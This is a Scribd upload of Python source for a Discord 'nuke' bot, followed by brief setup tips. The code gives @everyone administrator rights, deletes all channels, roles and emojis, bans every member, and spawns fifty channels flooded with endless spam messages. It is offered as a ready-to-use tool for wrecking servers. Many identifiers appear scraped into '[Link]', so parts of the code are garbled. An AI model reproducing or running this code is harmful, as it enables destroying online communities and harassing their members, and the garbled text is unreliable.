0% found this document useful (0 votes)
764 views4 pages

Discord Nuke Bot Code Guide

Uploaded by

twitteruser20200
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
764 views4 pages

Discord Nuke Bot Code Guide

Uploaded by

twitteruser20200
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd

import discord

from [Link] import commands


import random
from discord import Permissions
from colorama import Fore, Style
import asyncio

SPAM_CHANNEL = ["SPAM CHANNEL HERE”]


SPAM_MESSAGE = ["SPAM MESSAGE HERE"]

client = [Link](command_prefix="PREFIX HERE")

@[Link]
async def on_ready():
print([Link] + 'Crystals Nuke Bot is on!! Do (Prefix) to
nuke discord servers!!' + [Link])
await
client.change_presence(activity=[Link](name="BIO
HERE"))

@[Link]()
async def nuke(ctx):
await [Link]()
guild = [Link]
try:
role = [Link]([Link], name = "@everyone")
await [Link](permissions = [Link]())
print([Link] + "[+] Gave Everyone Admin" +
[Link])
except:
print([Link] + "Crystal Runs You" + [Link])
for channel in [Link]:
try:
await [Link]()
print([Link] + f" [+] {[Link]} Was Deleted." +
[Link])
except:
print([Link] + f" [-] {[Link]} Was Not
Deleted." + [Link])
for member in [Link]:
try:
await [Link]()
print([Link] + f" [+]
{[Link]}#{[Link]} Was Banned" +
[Link])
except:
print([Link] + f" [-]
{[Link]}#{[Link]} Was Not Banned." +
[Link])
for role in [Link]:
try:
await [Link]()
print([Link] + f" [+] {[Link]} Was Deleted" +
[Link])
except:
print([Link] + f" [-] {[Link]} Was Not Deleted" +
[Link])
for emoji in list([Link]):
try:
await [Link]()
print([Link] + f" [+] {[Link]} Was Deleted" +
[Link])
except:
print([Link] + f" [-] {[Link]} Was Not Deleted" +
[Link])
banned_users = await [Link]()
for ban_entry in banned_users:
user = ban_entry.user
try:
await [Link]("YOUR ID")
print([Link] + f" [-] {[Link]}#{[Link]}
Was Unbanned." + [Link])
except:
print([Link] + f" [+]
{[Link]}#{[Link]} Was Not Unbanned." +
[Link])
await guild.create_text_channel("crystals nukebot")
for channel in guild.text_channels:
link = await channel.create_invite(max_age = 0,
max_uses = 0)
print(f"New Invite: {link}")
amount = 50
for i in range(amount):
await
guild.create_text_channel([Link](SPAM_CHANNEL))
print(f"Nuked {[Link]} Crystal Nuker Runs You")
return

@[Link]
async def on_guild_channel_create(channel):
while True:
await [Link]([Link](SPAM_MESSAGE))

[Link](“BOT TOKEN HERE")

NOTE/EDITED: Make Sure to use either Visual Studio Code or


[Link] and select and use Python or else the code will mess up!!!!!
(Also delete this part in the code or else won’t work!)

You might also like